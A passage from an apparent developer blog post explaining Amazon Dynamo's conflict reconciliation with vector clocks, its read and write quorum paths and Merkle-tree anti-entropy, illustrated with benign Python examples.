&lt;/span&gt;        &lt;span class="n"&gt;all_items&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;set&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;set&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="n"&gt;merged_clock&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;VectorClock&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;cart&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;carts&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="n"&gt;all_items&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;update&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cart&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;items&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;          &lt;span class="c1"&gt;# Union: keep everything
&lt;/span&gt;            &lt;span class="n"&gt;merged_clock&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;merged_clock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;merge&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cart&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;vector_clock&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nc"&gt;ShoppingCart&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;items&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nf"&gt;sorted&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;all_items&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;vector_clock&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;merged_clock&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;


&lt;span class="c1"&gt;# Example conflict scenario
&lt;/span&gt;&lt;span class="n"&gt;cart1&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;ShoppingCart&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;items&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;shoes&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;jacket&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="n"&gt;vector_clock&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nc"&gt;VectorClock&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;N1&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;}))&lt;/span&gt;
&lt;span class="n"&gt;cart2&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;ShoppingCart&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;items&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;shoes&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;hat&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;    &lt;span class="n"&gt;vector_clock&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nc"&gt;VectorClock&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;N2&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;}))&lt;/span&gt;

&lt;span class="c1"&gt;# Dynamo detected a conflict and passes both versions to our reconcile()
&lt;/span&gt;&lt;span class="n"&gt;reconciled&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ShoppingCart&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;reconcile&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="n"&gt;cart1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cart2&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;reconciled&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;items&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;  &lt;span class="c1"&gt;# ['hat', 'jacket', 'shoes'] — union!
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  The Deletion Problem (Why This Gets Tricky)
&lt;/h3&gt;

&lt;p&gt;The union strategy has a nasty edge case: &lt;strong&gt;deleted items can come back from the dead&lt;/strong&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;T=0:  Cart: {shoes, hat}
T=1:  Customer removes hat → Cart: {shoes}           Clock: [N1:3]
T=2:  Network partition — Node2 still has old state
T=3:  A concurrent write lands on Node2 (still {shoes, hat})  Clock: [N2:3]
T=4:  Network heals → conflict detected
T=5:  Union merge: {shoes} ∪ {shoes, hat} = {shoes, hat}

Result: Hat is BACK! Customer removed it, but it reappeared.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Amazon explicitly accepts this trade-off. A "ghost" item in a cart is a minor annoyance. Losing a cart addition during a Black Friday sale is lost revenue.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Engineering depth note&lt;/strong&gt;: Merge logic must be domain-specific and carefully designed. Adding items is commutative (order doesn't matter) and easy to merge. Removing items is not—a deletion in one concurrent branch may be silently ignored during a union-based merge. This is an intentional trade-off in Dynamo's design, but it means the application must reason carefully about add vs. remove semantics. If your data doesn't naturally support union merges (e.g., a counter, a user's address), you need a different strategy—such as CRDTs, last-write-wins with timestamps, or simply rejecting concurrent writes for that data type.&lt;/p&gt;
&lt;/blockquote&gt;
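&lt;p&gt;For data that can't be union-merged, the last-write-wins strategy mentioned above is straightforward to sketch. The &lt;code&gt;LWWRegister&lt;/code&gt; below is an illustrative construction, not something from the paper: each write carries a timestamp, and merging keeps the newest version, at the cost of silently discarding the older concurrent write.&lt;/p&gt;

```python
from dataclasses import dataclass

@dataclass
class LWWRegister:
    """Last-write-wins register: the write with the highest timestamp
    survives a merge; the older concurrent write is discarded."""
    value: str
    timestamp: float

    @staticmethod
    def merge(versions: list["LWWRegister"]) -> "LWWRegister":
        # Highest timestamp wins; ties broken by value for determinism.
        return max(versions, key=lambda v: (v.timestamp, v.value))

old = LWWRegister("123 Main St", timestamp=100.0)
new = LWWRegister("456 Oak Ave", timestamp=105.0)
print(LWWRegister.merge([old, new]).value)  # 456 Oak Ave
```

Note the mirror-image trade-off: a last-write-wins address never resurrects deleted data, but it can drop a concurrent update entirely, which is exactly why Amazon rejected it for carts.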

&lt;h2&gt;
  
  
  Read and Write Flow
&lt;/h2&gt;

&lt;p&gt;The diagrams above show the high-level flow, but let's walk through what actually happens step-by-step during a read and a write. Understanding this concretely will make the earlier concepts click.&lt;/p&gt;

&lt;h3&gt;
  
  
  Write Path
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Step-by-step narration of a PUT request:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Client sends the request&lt;/strong&gt; to any node (via a load balancer) or directly to the coordinator.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The coordinator is determined&lt;/strong&gt; — this is the first node in the preference list for the key's hash position on the ring.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Vector clock is updated&lt;/strong&gt; — the coordinator increments its own counter in the vector clock, creating a new version.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The coordinator writes locally&lt;/strong&gt;, then fans out the write to the other N-1 nodes in the preference list simultaneously.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The coordinator waits for W acknowledgments.&lt;/strong&gt; It does NOT wait for all N — just the first W to respond. The remaining nodes that haven't responded yet will get the write eventually (or via hinted handoff if they're down).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Once W ACKs arrive, the coordinator returns success&lt;/strong&gt; to the client. From the client's perspective, the write is done.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc1huhmo7yy7mgc5fhxpt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc1huhmo7yy7mgc5fhxpt.png" alt="image" width="638" height="2044"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key insight about the write path&lt;/strong&gt;: The client gets a success response as soon as W nodes confirm. The other (N - W) nodes will receive the write asynchronously. This is why the system is "eventually consistent"—all nodes &lt;em&gt;will&lt;/em&gt; have the data, just not necessarily at the same moment.&lt;/p&gt;
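&lt;p&gt;Step 5, "wait for W, not N", is the heart of the write path. A toy model of the coordinator, where each replica is just a callable that returns whether it acknowledged (real replicas would be RPC calls):&lt;/p&gt;

```python
from concurrent.futures import ThreadPoolExecutor, as_completed

def coordinate_write(replicas, key, value, w=2):
    """Fan the write out to every replica at once, but report success
    to the client as soon as the first W acknowledgments arrive."""
    pool = ThreadPoolExecutor(max_workers=len(replicas))
    futures = [pool.submit(replica, key, value) for replica in replicas]
    acks = 0
    for fut in as_completed(futures):
        if fut.result():  # this replica acknowledged the write
            acks += 1
        if acks >= w:
            pool.shutdown(wait=False)  # don't block on the stragglers
            return True
    pool.shutdown(wait=False)
    return False  # fewer than W acks: the write fails

# Three replicas: two healthy, one down (modeled as callables).
replicas = [lambda k, v: True, lambda k, v: True, lambda k, v: False]
print(coordinate_write(replicas, "cart:alice", ["shoes"], w=2))  # True
```

With N=3 and W=2, one dead replica costs nothing: the client still sees success as soon as the two healthy nodes reply.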

&lt;h3&gt;
  
  
  Read Path
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Step-by-step narration of a GET request:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Client sends the request&lt;/strong&gt; to the coordinator for that key.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The coordinator sends read requests to all N nodes&lt;/strong&gt; in the preference list simultaneously (not just R). This is important — it contacts all N, but only needs R to respond.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Wait for R responses.&lt;/strong&gt; The coordinator returns as soon as R nodes have replied, without waiting for the slower ones.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Compare the versions returned.&lt;/strong&gt; The coordinator checks all the vector clocks:

&lt;ul&gt;
&lt;li&gt;If all versions are identical → return the single version immediately.&lt;/li&gt;
&lt;li&gt;If one version's clock dominates the others (it's causally "newer") → return that version.&lt;/li&gt;
&lt;li&gt;If versions are concurrent (neither clock dominates) → return &lt;strong&gt;all versions&lt;/strong&gt; to the client, which must merge them.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Read repair&lt;/strong&gt; happens in the background: if the coordinator noticed any node returned a stale version, it sends the latest version to that node to bring it up to date.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdyhzld5b2djtdyvmoold.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdyhzld5b2djtdyvmoold.png" alt="image" width="800" height="1102"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why does the client receive the conflict instead of the coordinator resolving it?&lt;/strong&gt; Because Dynamo is a general-purpose storage engine. It doesn't know whether you're storing a shopping cart, a user profile, or a session token. Only &lt;em&gt;your application&lt;/em&gt; knows how to merge two conflicting versions in a way that makes business sense. The coordinator hands you the raw concurrent versions along with the vector clock context, and you do the right thing for your use case.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The vector clock context is the key to closing the loop&lt;/strong&gt;: when the client writes the merged version back, it must include the context (the merged vector clock). This tells Dynamo that the new write has "seen" all the concurrent versions, so the conflict is resolved. Without this context, Dynamo might think it's &lt;em&gt;another&lt;/em&gt; concurrent write on top of the still-unresolved conflict.&lt;/p&gt;
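&lt;p&gt;Put together, the client-side loop (read, merge, write back with context) looks roughly like this. The &lt;code&gt;resolve_on_read&lt;/code&gt; helper and its signature are hypothetical, shaped after Dynamo's get/put context interface:&lt;/p&gt;

```python
def resolve_on_read(versions, contexts, merge):
    """If the store returned several concurrent versions, merge the
    values AND the vector-clock contexts, then write the result back
    with the combined context so the store sees the conflict as resolved."""
    if len(versions) == 1:
        return versions[0], contexts[0]  # no conflict, nothing to do
    merged_value = merge(versions)
    merged_context: dict[str, int] = {}
    for ctx in contexts:  # element-wise max over every clock seen
        for node, count in ctx.items():
            merged_context[node] = max(merged_context.get(node, 0), count)
    return merged_value, merged_context

value, ctx = resolve_on_read(
    versions=[{"shoes", "jacket"}, {"shoes", "hat"}],
    contexts=[{"N1": 2}, {"N2": 2}],
    merge=lambda vs: set().union(*vs),  # the cart's union strategy
)
print(sorted(value))  # ['hat', 'jacket', 'shoes']
print(ctx)            # {'N1': 2, 'N2': 2}
```

The merged context {N1:2, N2:2} dominates both original clocks, so the follow-up write supersedes both concurrent versions rather than creating a third branch.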

&lt;h2&gt;
  
  
  Merkle Trees for Anti-Entropy
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem: How Do You Know When Replicas Are Out of Sync?
&lt;/h3&gt;

&lt;p&gt;After a node recovers from a failure, it may have missed some writes. After a network partition heals, two replicas might diverge. How does Dynamo detect and fix these differences?&lt;/p&gt;

&lt;p&gt;The brute-force approach would be: "Every hour, compare every key on Node A against Node B, and sync anything that's different." But at Amazon's scale, a single node might store hundreds of millions of keys. Comparing them all one by one would be so slow and bandwidth-intensive that it would interfere with normal traffic.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Dynamo uses Merkle trees to solve this efficiently.&lt;/strong&gt; The core idea: instead of comparing individual keys, compare &lt;em&gt;hashes of groups of keys&lt;/em&gt;. If the hash matches, that whole group is identical—skip it. Only drill down into groups where hashes differ.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Important&lt;/strong&gt;: Merkle tree sync is a &lt;strong&gt;background anti-entropy&lt;/strong&gt; mechanism. It's not on the hot read/write path. Normal reads and writes use vector clocks and quorums for versioning. Merkle trees are for the repair process that runs periodically in the background to catch any inconsistencies that slipped through.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  How a Merkle Tree Is Built
&lt;/h3&gt;

&lt;p&gt;Each node builds a Merkle tree over its data, organized by key ranges:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Leaf nodes&lt;/strong&gt; contain the hash of a small range of actual data keys (e.g., hash of all values for keys k1, k2, k3).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Internal nodes&lt;/strong&gt; contain the hash of their children's hashes.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The root&lt;/strong&gt; is a single hash representing &lt;em&gt;all&lt;/em&gt; the data on the node.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Felpfz43eb8y2waok30py.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Felpfz43eb8y2waok30py.png" alt="image" width="800" height="432"&gt;&lt;/a&gt;&lt;/p&gt;
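&lt;p&gt;A minimal version of this construction, using SHA-256 over toy key/value pairs (illustrative only; Dynamo maintains a separate tree per key range it hosts):&lt;/p&gt;

```python
import hashlib

def h(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def build_merkle(leaves: list[bytes]) -> list[list[str]]:
    """Build the tree bottom-up; returns levels, leaves first, root last."""
    level = [h(leaf) for leaf in leaves]
    levels = [level]
    while len(level) > 1:
        # Each parent hashes the concatenation of its children's hashes.
        level = [h("".join(level[i:i + 2]).encode())
                 for i in range(0, len(level), 2)]
        levels.append(level)
    return levels

tree = build_merkle([b"k1=v1", b"k2=v2", b"k3=v3", b"k4=v4"])
root = tree[-1][0]

# Changing a single key changes the root hash, which is how two
# replicas detect divergence without exchanging any actual data.
tree2 = build_merkle([b"k1=v1", b"k2=CHANGED", b"k3=v3", b"k4=v4"])
print(root != tree2[-1][0])  # True
```

Note that the subtree hash over the unchanged keys (k3, k4) is identical in both trees, which is precisely what lets the sync protocol skip that half of the key space.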

&lt;h3&gt;
  
  
  How Two Nodes Sync Using Merkle Trees
&lt;/h3&gt;

&lt;p&gt;When Node A and Node B want to check if they're in sync:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1&lt;/strong&gt;: Compare root hashes. If they're the same, everything is identical. Done! (No network traffic for the data itself.)&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 2&lt;/strong&gt;: If roots differ, compare their left children. Same? Skip that entire half of the key space.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 3&lt;/strong&gt;: Keep descending only into subtrees where hashes differ, until you reach the leaf nodes.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 4&lt;/strong&gt;: Sync only the specific keys in the differing leaf nodes.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Example: Comparing two nodes

Node A root: abc789  ← differs from Node B!
Node B root: abc788

Compare left subtrees:
  Node A left:  xyz123
  Node B left:  xyz123  ← same! Skip entire left half.

Compare right subtrees:
  Node A right: def456
  Node B right: def457  ← differs! Go deeper.

Compare right-left subtree:
  Node A right-left: ghi111
  Node B right-left: ghi111  ← same! Skip.

Compare right-right subtree:
  Node A right-right: jkl222
  Node B right-right: jkl333  ← differs! These are leaves.

→ Sync only the keys in the right-right leaf range (e.g., k10, k11, k12)
  Instead of comparing all 1 million keys, we compared five hash pairs
  and synced only 3 keys!
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Synchronization process in code&lt;/strong&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;sync_replicas&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;node_a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;node_b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;key_range&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
    Efficiently sync two nodes using Merkle trees.
    Instead of comparing all keys, we compare hashes top-down.
    Only the ranges where hashes differ need actual key-level sync.
    &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
    &lt;span class="n"&gt;tree_a&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;node_a&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get_merkle_tree&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key_range&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;tree_b&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;node_b&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get_merkle_tree&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key_range&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;# Step 1: Compare root hashes first.
&lt;/span&gt;    &lt;span class="c1"&gt;# If they match, every key in this range is identical — nothing to do!
&lt;/span&gt;    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;tree_a&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;root_hash&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;tree_b&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;root_hash&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt;  &lt;span class="c1"&gt;# Zero data transferred — full match!
&lt;/span&gt;
    &lt;span class="c1"&gt;# Step 2: Recursively find differences by traversing top-down.
&lt;/span&gt;    &lt;span class="c1"&gt;# Only descend into subtrees where hashes differ.
&lt;/span&gt;    &lt;span class="n"&gt;differences&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[]&lt;/span&gt;
    &lt;span class="n"&gt;stack&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[(&lt;/span&gt;&lt;span class="n"&gt;tree_a&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;root&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;tree_b&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;root&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;

    &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="n"&gt;stack&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;node_a_subtree&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;node_b_subtree&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;stack&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;pop&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;node_a_subtree&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nb"&gt;hash&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;node_b_subtree&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nb"&gt;hash&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;continue&lt;/span&gt;  &lt;span class="c1"&gt;# This whole subtree matches — skip it!
&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;node_a_subtree&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;is_leaf&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="c1"&gt;# Found a differing leaf — these keys need syncing
&lt;/span&gt;            &lt;span class="n"&gt;differences&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;extend&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;node_a_subtree&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;keys&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="c1"&gt;# Not a leaf yet — recurse into children
&lt;/span&gt;            &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;child_a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;child_b&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nf"&gt;zip&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;node_a_subtree&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;children&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;node_b_subtree&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;children&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
                &lt;span class="n"&gt;stack&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;append&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="n"&gt;child_a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;child_b&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

    &lt;span class="c1"&gt;# Step 3: Sync only the specific keys that differed at leaf level.
&lt;/span&gt;    &lt;span class="c1"&gt;# This might be a handful of keys, not millions.
&lt;/span&gt;    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;differences&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nf"&gt;sync_key&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;node_a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;node_b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Why This Is Efficient
&lt;/h3&gt;

&lt;p&gt;The power of Merkle trees is that the number of hash comparisons you need scales with the &lt;em&gt;depth of the tree&lt;/em&gt; (logarithmic in the number of keys), not the number of keys themselves.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Node with 1,000,000 keys:

Naive approach:  Compare 1,000,000 keys individually
                 Cost: 1,000,000 comparisons

Merkle tree:     Compare O(log N) hashes top-down
                 Tree depth ≈ 20 levels
                 Cost: 20 comparisons to find differences
                 Then sync only the differing leaves (~few keys)

Speedup: ~50,000x fewer comparisons!
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And critically, if two nodes are &lt;strong&gt;mostly in sync&lt;/strong&gt; (which is almost always true in a healthy cluster), the root hashes often match entirely and zero data needs to be transferred. The anti-entropy process is very cheap in the common case.&lt;/p&gt;

&lt;h2&gt;
  
  
  Membership and Failure Detection
&lt;/h2&gt;

&lt;p&gt;Dynamo uses a gossip protocol for membership management. Each node periodically exchanges membership information with random peers. There is no master node—all coordination is fully decentralized.&lt;/p&gt;

&lt;h3&gt;
  
  
  Gossip-Based Membership
&lt;/h3&gt;

